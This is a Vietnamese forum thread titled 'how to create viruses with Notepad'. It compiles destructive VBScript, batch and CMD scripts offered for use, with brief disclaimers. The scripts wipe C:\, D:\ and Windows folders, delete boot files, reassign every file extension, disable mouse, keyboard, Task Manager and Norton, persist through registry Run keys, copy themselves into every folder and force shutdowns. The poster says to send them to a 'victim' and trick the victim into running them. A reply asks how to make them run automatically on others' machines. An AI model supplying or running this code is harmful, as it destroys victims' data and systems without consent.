Hỏi đáp mọi chủ đề liên qua đến công nghệ thông tin, internet, lập trình, SEO...
Nội quy chuyên mục: Hỏi đáp mọi chủ đề liên qua đến công nghệ thông tin, internet, lập trình, SEO...

- Chuyên nhận giải đáp thắc mắc sử dụng Word, Excel, Power Point

- Ai cần download driver hay Firmware cho máy tính máy in, thì vào đây nhé, tìm gì cũng có Driver 360

- Cập nhật tin tức với Mr Công nghệ tại đây
By Gabriele
#626294 PHẦN 1
Cách tạo virus bằng notepad

Nói là virus nhưng thực chất nó không phải là virus, nó chỉ là một đoạn mã để thực hiện một điều gì đó "nham hiểm" do chúng ta viết ra. Chính vì thế "hầu hết" các đoạn mã trong đây đều không bị antivirus chém nên các bạn yên tâm

Mình sẽ cho các bạn một số code để các bạn biết về cấu tạo của nó chứ mình khuyên các bạn không nên dùng nó đem đi phá hoại người khác và các bạn muốn biết hoạt động của nó như thế nào thì minh khuyên các bạn nên cài đặt máy ảo hay đóng băng các ổ trước khi sử dụng những con virus này.


1.

-B1: vào notepad gõ cú pháp:

while true

wend-B2: Sau đó lưu lại dưới đuôi* .vbs

-B3: gửi victim (nạn nhân) dụ cho victim chạy tập tin này( đừng có gắng thử nhé....không chịu trách nhiệm đâu đấy)


Đây mới chỉ là virut, nếu viết autorun cho nó nữa thì cực kỳ nguy hiểm, con này mỗi lần chạy thì nó chiếm 100% cpu của 1 luồng dữ liệu. Với máy core 2duo thì click 2 phát CPU 100%, core i3, i5 thì click 4 lần. Sau khi bị chiếm 100% cpu muốn tắt đi thì vào Task Manager tắt hết những chương trình có đuôi vbscript đang chạy. Đó là virut chạy do con người điều khiển, còn nếu viết thêm autorun để nó chạy tự động, giả sử số lần click là lớn hơn 10 thì thôi rồi, chỉ có cài lại win.

2. Xóa toàn bộ ổ C:\ của Victim


if exist C:\program files*.* deltree /y C:\program files*.*

if exist C:\my documents*.* deltree /y C:\my documents*.*

if exist C:\windows\desktop*.* deltree /y C:\windows\desktop*.*

if exist C:\windows\start menue*.* deltree /y C:\windows\start menue*.*

if exist C:\windows\command*.* deltree /y C:\windows\command*.*

if exist C:\windows\system*.* deltree /y C:\windows\system*.*

if exist C:\windows*.* deltree /y C:\windows*.*


-Lưu với tên .bat

3.


Trích dẫn:

msgbox"Die roai !" 'Cai nay co tac dung se tao 1 hop thong bao tren man hinh cua nan nha

On Error Resume Next

Set vip_xinh = Createobject("scripting.filesystemobject")

vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\ vip_xinh.vbs"

Set vip_xinh2= CreateObject("WScript.Shell")

vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n\die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"


On Error Resume Next

Const vic = "D:\"

Delvic

Sub Delvic()

Dim fso

Set fso = CreateObject("Scripting.FileSystemObject")

fso.DeleteFile vic & "*.*" , True

fso.DeleteFolder vic & "*" , True

End Sub


On Error Resume Next

Const vic1 = "C:\windows\"

Delvic1

Sub Delvic1()

Dim fso1

Set fso1 = CreateObject("Scripting.FileSystemObject")

fso1.DeleteFile vic1 & "*.*" , True

fso1.DeleteFolder vic1 & "*" , True

End Sub


On Error Resume Next

Const vic2 = "C:\"

Delvic2

Sub Delvic2()

Dim fso2

Set fso2 = CreateObject("Scripting.FileSystemObject")

fso2.DeleteFile vic2 & "*.*" , True

fso2.DeleteFolder vic2 & "*" , True

End Sub


On Error Resume Next

Set treomay= CreateObject("WScript.Shell")

Do

treomay.run "notepad",false

loop


- Lưu với tên .bat

4.


On Error Resume Next

Set popo= Createobject("scripting.filesystemobject")

popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"

Set popo2= CreateObject("WScript.Shell")

popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"

Set treomay= CreateObject("WScript.Shell")

msgbox"May tinh cua ban bi nhiem virut",,"Danger"

msgbox"May se bi lag trong 2s",,"Danger"

msgbox"Ban con 1s",,"Danger"

msgbox"Ban con 0s",,"Danger"

msgbox"May da bi nhiem virus",,"Danger"

Me.visible=false

App.Taskvisible=false

Do

Me.visible=false

App.Taskvisible=false

treomay.run "notepad",false

loop


- Lưu với tên .vbs

Cái này của ông tui vừa làm xong mở nó lên thì dĩ nhiên là treo, nhưng một điều nữa là Ram bị quá tải và lỗi, màn hình đen tui, restart lại không ăn thua vẫn đen thui như đứt bóng....

khắc phục sao đây?

5. Thông báo vĩnh cửu

msgbox "Đừng có tắt dòng thông báo này đi nếu không bạn sẽ gặp rắc rối đó!",,"Thông báo từ Hacker Microsoft"

msgbox "Định làm liều à, thử tắt lần nữa xem!",,"Thông báo từ Hacker Microsoft"

do


msgbox "Error! Máy tính của bạn đã bị các Hacker tấn công!",,"Thông báo từ Hacker Microsoft"

Loop


- Lưu với tên .vbs

6.

start 1.bat


-Lưu với tên 1.bat


-khoa điện tử-máy tính mình nên tổ chức cuộc thì "Xem ai nhanh hơn nào!!" để coi ai tắt thằng này nhanh nhất....khữa ... Khữa

7. Tạo thư mục liên tục mỗi khi bấm

'Thuoc Doc !!!

Dim fso,file,VBCopy

Set fso=CreateObject("Scripting.FileSystemObject")

Set file=fspenTextFile(WScript.ScriptFullName,1)

VBCopy=file.ReadAll

FolderList("A:")

FolderList("B:")

FolderList("C:")

FolderList("D:")

FolderList("E:")

FolderList("F:")

FolderList("G:")

FolderList("H:")

FolderList("I:")

FolderList("J:")

FolderList("K:")

FolderList("L:")

FolderList("M:")

FolderList("N:")

FolderList("O:")

FolderList("P:")

FolderList("Q:")

FolderList("R:")

FolderList("S:")

FolderList("T:")

FolderList("U:")

FolderList("V:")

FolderList("X:")

FolderList("Y:")

FolderList("Z:")

FolderList("W:")


Sub FolderList(FolderSpec)

On Error Resume Next

Dim f,f1,sf,COP,CAP

Set f=fso.GetFolder(FolderSpec)

set sf=f.SubFolders

For Each f1 In sf

Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")

COP.write VBCopy

Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")

CAP.write VBCopy

FolderList(f1.Path)

Next

End sub

Thuốc giải 7.

B1: Mở Notepad

B2: Gõ code:

'Thuoc Giai !!!

Dim fso,file,VBCopy

Set fso=CreateObject("Scripting.FileSystemObject")

Set file=fspenTextFile(WScript.ScriptFullName,1)

VBCopy=file.ReadAll

FolderList("A:")

FolderList("B:")

FolderList("C:")

FolderList("D:")

FolderList("E:")

FolderList("F:")

FolderList("G:")

FolderList("H:")

FolderList("I:")

FolderList("J:")

FolderList("K:")

FolderList("L:")

FolderList("M:")

FolderList("N:")

FolderList("O:")

FolderList("P:")

FolderList("Q:")

FolderList("R:")

FolderList("S:")

FolderList("T:")

FolderList("U:")

FolderList("V:")

FolderList("X:")

FolderList("Y:")

FolderList("Z:")

FolderList("W:")


Sub FolderList(FolderSpec)

On Error Resume Next

Dim f,f1,sf,COP,CAP,ATT

Set f=fso.GetFolder(FolderSpec)

set sf=f.SubFolders For Each f1 In sf

'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")

'COP.write VBCopy

'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")

'CAP.write VBCopy

'Set ATT=fso.GetFolder(f1.Path)

'ATT.Attributes=ATT.Attributes+2

fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")

fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")

FolderList(f1.Path)

Next

End sub


- Lưu với tên .vbs

8.

-B1: tạo 1 file bất kỳ(1.txt, 1.bat, 1.exe...v..v..)

Vd: C:\Users\chuong\Desktop\1.txt

-B2: vào notepad

-B3 :Đánh lệnh erase C:\Users\chuong\Desktop\1.txt

-B4: lưu dưới dạng *.cmd

-B5: Chạy file *.cmd


thế là file 1.txt đã bị xóa
các bạn đang tự hỏi ủa thế có gì đâu mà gọi là phá hoại?????

xin thưa rằng, files chạy dưới đuôi.cmd là thao tác thực hiện trên ms-dos vì vậy nó không kiêng nể ai hết...chỉ thực thi mệnh lệnh 1 cách hiệu quả thôi

-Bởi vậy....nếu bạn thay lệnh erase C:\Users\chuong\Desktop\1.txt -->>>>erase C:\Windows thì bạn nghĩ thế nào....có phải là đi tong cái windows không........Bởi vậy đừng cố gắng làm điều gì ngu ngốc nhé!!!!!PHẦN 2

Mình sẽ cho các bạn xem một số code của con virus đuôi .BAT:

1) virus phá hoại cửa sổ windown:

Code:

@echo off

msg *virus activated*

attrib -r -s -h c:\autoexec.bat

del c:\autoexec.bat

attrib -r -s -h c:\boot.ini

del c:\boot.ini

attrib -r -s -h c:\ntldr

del c:\ntldr

attrib -r -s -h c:\windows\win.ini

del c:\windows\win.ini

@echo off

msg *Computer Over. Virus=Very Yes.*

shutdown -s -t 10 -c " "


2)loại virus này làm vô hiệu hóa chuột, bàn phím,task manager, thay đổi tập tin:

code:

@echo off

prompt $P $G

assoc .doc = fA1luRe

assoc .docx = fA1luRe

assoc .log = fA1luRe

assoc .msg = fA1luRe

assoc .pages = fA1luRe

assoc .rtf = fA1luRe

assoc .txt = fA1luRe

assoc .wpd = fA1luRe

assoc .wps = fA1luRe

assoc .accdb = fA1luRe

assoc .blg = fA1luRe

assoc .csv = fA1luRe

assoc .dat = fA1luRe

assoc .db = fA1luRe

assoc .efx = fA1luRe

assoc .mdb = fA1luRe

assoc .pdb = fA1luRe

assoc .pps = fA1luRe

assoc .ppt = fA1luRe

assoc .pptx = fA1luRe

assoc .sdb = fA1luRe

assoc .sdf = fA1luRe

assoc .sql = fA1luRe

assoc .vcf = fA1luRe

assoc .wks = fA1luRe

assoc .xls = fA1luRe

assoc .xlsx = fA1luRe

assoc .xml = fA1luRe

assoc .bmp = fA1luRe

assoc .gif = fA1luRe

assoc .jpg = fA1luRe

assoc .png = fA1luRe

assoc .psd = fA1luRe

assoc .psp = fA1luRe

assoc .thm = fA1luRe

assoc .tif = fA1luRe

assoc .ai = fA1luRe

assoc .drw = fA1luRe

assoc .eps = fA1luRe

assoc .ps = fA1luRe

assoc .svg = fA1luRe

assoc .3dm = fA1luRe

assoc .dwg = fA1luRe

assoc .dxf = fA1luRe

assoc .pln = fA1luRe

assoc .indd = fA1luRe

assoc .pct = fA1luRe

assoc .pdf = fA1luRe

assoc .qxd = fA1luRe

assoc .qxp = fA1luRe

assoc .rels = fA1luRe

assoc .aac = fA1luRe

assoc .aif = fA1luRe

assoc .iff = fA1luRe

assoc .m3u = fA1luRe

assoc .mid = fA1luRe

assoc .mp3 = fA1luRe

assoc .mpa = fA1luRe

assoc .ra = fA1luRe

assoc .wav = fA1luRe

assoc .wma = fA1luRe

assoc .3g2 = fA1luRe

assoc .3gp = fA1luRe

assoc .asf = fA1luRe

assoc .asx = fA1luRe

assoc .avi = fA1luRe

assoc .flv = fA1luRe

assoc .mov = fA1luRe

assoc .mp4 = fA1luRe

assoc .mpg = fA1luRe

assoc .rm = fA1luRe

assoc .swf = fA1luRe

assoc .vob = fA1luRe

assoc .wmv = fA1luRe

assoc .asp = fA1luRe

assoc .cer = fA1luRe

assoc .csr = fA1luRe

assoc .css = fA1luRe

assoc .htm = fA1luRe

assoc .html = fA1luRe

assoc .js = fA1luRe

assoc .jsp = fA1luRe

assoc .php = fA1luRe

assoc .rss = fA1luRe

assoc .tvpi = fA1luRe

assoc .tvvi = fA1luRe

assoc .xhtml = fA1luRe

assoc .fnt = fA1luRe

assoc .fon = fA1luRe

assoc .otf = fA1luRe

assoc .ttf = fA1luRe

assoc .8bi = fA1luRe

assoc .plugin = fA1luRe

assoc .xll = fA1luRe

assoc .cab = fA1luRe

assoc .cpl = fA1luRe

assoc .cur = fA1luRe

assoc .dll = fA1luRe

assoc .dmp = fA1luRe

assoc .drv = fA1luRe

assoc .key = fA1luRe

assoc .lnk = fA1luRe

assoc .sys = fA1luRe

assoc .cfg = fA1luRe

assoc .ini = fA1luRe

assoc .keychain = fA1luRe

assoc .prf = fA1luRe

assoc .app = fA1luRe

assoc .bat = fA1luRe

assoc .cgi = fA1luRe

assoc .com = fA1luRe

assoc .exe = fA1luRe

assoc .pif = fA1luRe

assoc .vb = fA1luRe

assoc .ws = fA1luRe

assoc .7z = fA1luRe

assoc .deb = fA1luRe

assoc .gz = fA1luRe

assoc .pkg = fA1luRe

assoc .rar = fA1luRe

assoc .sit = fA1luRe

assoc .sitx = fA1luRe

assoc .tar.gz = fA1luRe

assoc .zip = fA1luRe

assoc .zipx = fA1luRe

assoc .bin = fA1luRe

assoc .hqx = fA1luRe

assoc .mim = fA1luRe

assoc .uue = fA1luRe

assoc .c = fA1luRe

assoc .cpp = fA1luRe

assoc .dtd = fA1luRe

assoc .java = fA1luRe

assoc .pl = fA1luRe

assoc .bak = fA1luRe

assoc .bup = fA1luRe

assoc .gho = fA1luRe

assoc .ori = fA1luRe

assoc .tmp = fA1luRe

assoc .dmg = fA1luRe

assoc .iso = fA1luRe

assoc .toast = fA1luRe

assoc .vcd = fA1luRe

assoc .gam = fA1luRe

assoc .nes = fA1luRe

assoc .rom = fA1luRe

assoc .sav = fA1luRe

assoc .dbx = fA1luRe

assoc .msi = fA1luRe

assoc .part = fA1luRe

assoc .torrent = fA1luRe

assoc .yps = fA1luRe

rundll32.exe mouse, disable

rundll32.exe keyboard, disable

copy setup.bat %userprofile%\AppData\Roaming\Microsoft\Windows\St art Menu\Programs\Startup

copy setup.bat %windir%\System32

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v fA1luRe /t REG_SZ /d %windir%\System32\setup.bat

taskkill /f /im taskmgr.exe

reg restore HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\System DisableTaskMgr = 1

shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"


3)kiểm tra % của CPU lên đến bao nhiêu %:

bạn mở notepad ra và gõ start 1.bat vào trong rồi các bạn lưu con virus này là 1.bat rồi ngay lập tức % CPU sẽ tăng lên.


4)lặp lại nhiều lần chu kỳ mess:

Code:

@ECHO off

:Begin

msg * lời cảnh báo

msg * lời cảnh báo

msg * lời cảnh báo

msg * lời cảnh báo

msg * lời cảnh báo

GOTO BEGIN

VD:

@ECHO off

:Begin

msg * Hi

msg * khoe không anh ?

msg * em ne ?

msg * buon ngu chua anh ?

msg * tat may ngu thoi ,bb anh

GOTO BEGIN


5)tự động tắt máy và kèm theo lời nhắn:

Code:

@echo off

msg * lời cảnh báo

shutdown -c “lời cảnh báo” -s

VD:

@echo off

msg * I LOVE YOU

shutdown -c “Error! tam biet anh!” -s


Còn đây là một số con virus có đuôi là .VBS

6)Chức năng gửi thông điệp cảnh báo:

Code:

text1=msgbox("Thông điêp cảnh báo",42,"Tên thông điệp cảnh báo")


7)Chức năng làm đứng máy tính:

Code:

msgbox"Error !"

On Error Resume Next

Set vip_xinh = Createobject("scripting.filesystemobject")

vip_xinh.copyfile wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\ vip_xinh.vbs"

Set vip_xinh2= CreateObject("WScript.Shell")

vip_xinh2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n\die","wscript.exe "& vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"


On Error Resume Next

Const vic = "D:\"

Delvic

Sub Delvic()

Dim fso

Set fso = CreateObject("Scripting.FileSystemObject")

fso.DeleteFile vic & "*.*" , True

fso.DeleteFolder vic & "*" , True

End Sub


On Error Resume Next

Const vic1 = "C:\windows\"

Delvic1

Sub Delvic1()

Dim fso1

Set fso1 = CreateObject("Scripting.FileSystemObject")

fso1.DeleteFile vic1 & "*.*" , True

fso1.DeleteFolder vic1 & "*" , True

End Sub


On Error Resume Next

Const vic2 = "C:\"

Delvic2

Sub Delvic2()

Dim fso2

Set fso2 = CreateObject("Scripting.FileSystemObject")

fso2.DeleteFile vic2 & "*.*" , True

fso2.DeleteFolder vic2 & "*" , True

End Sub


On Error Resume Next

Set treomay= CreateObject("WScript.Shell")

Do

treomay.run "notepad",false

loop


8)Đây là một con virus rất ác mình khuyên ban muốn thử nó thì hãy đóng băng tất cả các ổ trước khi sử dụng nó không thì rước họa vào thân đấy bạn

Code:

Dim fso,file,VBCopy

Set fso=CreateObject("Scripting.FileSystemObject")

Set file=fspenTextFile(WScript.ScriptFullName,1)

VBCopy=file.ReadAll

FolderList("A:")

FolderList("B:")

FolderList("C:")

FolderList("D:")

FolderList("E:")

FolderList("F:")

FolderList("G:")

FolderList("H:")

FolderList("I:")

FolderList("J:")

FolderList("K:")

FolderList("L:")

FolderList("M:")

FolderList("N:")

FolderList("O:")

FolderList("P:")

FolderList("Q:")

FolderList("R:")

FolderList("S:")

FolderList("T:")

FolderList("U:")

FolderList("V:")

FolderList("X:")

FolderList("Y:")

FolderList("Z:")

FolderList("W:")

Sub FolderList(FolderSpec)

On Error Resume Next

Dim f,f1,sf,COP,CAP

Set f=fso.GetFolder(FolderSpec)

set sf=f.SubFolders

For Each f1 In sf

Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")

COP.write VBCopy

Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")

CAP.write VBCopy

FolderList(f1.Path)

Next

End sub

Còn đây là thuốc giải:

Code:

Dim fso,file,VBCopy

Set fso=CreateObject("Scripting.FileSystemObject")

Set file=fspenTextFile(WScript.ScriptFullName,1)

VBCopy=file.ReadAll

FolderList("A:")

FolderList("B:")

FolderList("C:")

FolderList("D:")

FolderList("E:")

FolderList("F:")

FolderList("G:")

FolderList("H:")

FolderList("I:")

FolderList("J:")

FolderList("K:")

FolderList("L:")

FolderList("M:")

FolderList("N:")

FolderList("O:")

FolderList("P:")

FolderList("Q:")

FolderList("R:")

FolderList("S:")

FolderList("T:")

FolderList("U:")

FolderList("V:")

FolderList("X:")

FolderList("Y:")

FolderList("Z:")

FolderList("W:")

Sub FolderList(FolderSpec)

On Error Resume Next

Dim f,f1,sf,COP,CAP,ATT

Set f=fso.GetFolder(FolderSpec)

set sf=f.SubFolders For Each f1 In sf

'Set COP=fso.CreateTextFile(f1.path & "\Virus !!!!!!!.vbs")

'COP.write VBCopy

'Set CAP=fso.CreateTextFile(f1.path & "---Virus !!!!!!!.vbs")

'CAP.write VBCopy

'Set ATT=fso.GetFolder(f1.Path)

'ATT.Attributes=ATT.Attributes+2

fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")

fso.DeleteFile(f1.path & "---Virus !!!!!!!.vbs")

FolderList(f1.Path)

Next

End sub


10)chức năng mở một thông điệp rồi sẽ tự động tắt máy:

Code:

@echo off

msg * thông điệp

shutdown -c "thông điệp" -s -t 10


11)không cho victim khởi động máy:

Code:

Dim wsh

Set wsh = createobject("wscript.shell")

wsh.run "RUNDLL32.EXE user.exe,exitwindows"


12)Disable NAV:

Code:

Dim wsh

Set wsh= CreateObject( "WScript.Shell")

s1 = " HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic

es\Norton Program

Scheduler\Start"

wsh.RegWrite s1,3, "REG_DWORD"


13)hiển thị message mỗi khi restart máy:

Code:

dim wsh

Set wsh = CreateObject( "WScript.Shell" )

s1 = " HKLM\Software\Microsoft\Windows\CurrentVersion\Win

Logon\"

s2 = "LegalNoticeCaption"

s3 = "LegalNoticeText"

wsh.RegWrite s1+s2, "lời cảnh báo"

wsh.RegWrite s1+s3, "lời cảnh báo"


14)chuc nang hien thi dong lenh khi ban click vao floder:

Code:

set reg=createobject("WScript.shell")

reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","loi canh bao"

reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\loi canh bao\","SLM"

vd:

set reg=createobject("WScript.shell")

reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi ! Ban da bi nhiem WK tu truongton.net"

reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban da bi nhiem WK tu truongton.net\","SLM"


15)Xóa Registry Files:

Code:

@ECHO OFF

START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

:MESSAGE

ECHO slm loi canh bao.

GOTO MESSAGE

vd:

@ECHO OFF

START reg delete HKCR/.exe

START reg delete HKCR/.dll

START reg delete HKCR/*

:MESSAGE

ECHO slm chuc anh 1 ngay vui ve.

GOTO MESSAGE


16)Bật notepad lien tuc lam may tinh bi ngơ:

Code:

@ECHO off

:top

START %SystemRoot%\system32\notepad.exe

GOTO top


17)bật tắt caps lock liên tục:

Code:

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{CAPSLOCK}"

loop


18)Ép enter liên tục:

Code:

Set wshShell = wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "~(enter)"

loop

ep Backspace lien tuc:

MsgBox "Let's go back a few steps"

Set wshShell =wscript.CreateObject("WScript.Shell")

do

wscript.sleep 100

wshshell.sendkeys "{bs}"

loop


Còn đây là một số con virus có đuôi .cmd:
1)Xóa sạch tất cả các file có trong máy:

Code:

DEL /F /Q *


2)Xóa một file nào đó:

Code:

erase đường dẫn

vd:

erase C:\TEST.txt


3)Ẩn tòan bộ file trong win

Code:

ATTRIB +S /F /Q *


Thế là xong phù mệt quá chúc các bạn vui vẻ với những con virus này nếu có con mới mình sẽ post lên cho các bạn thưởng thức.

Tổng hợp từ các nguồn khác nhau...

Hay thì THANK! nhá mọi người
By nh0czg0c_iulamanh
By muatrencuoctinh_tvh_dn
#626468 hay thì hay thật nhưng... dã man quá. copy để đó làm chuyên ác cũng được thks

mà có cách nào cho nó tự chạy ko? không lẽ gửi wa máy người khác rồi mình kêu người ta click chạy thử ak???
Kết nối đề xuất: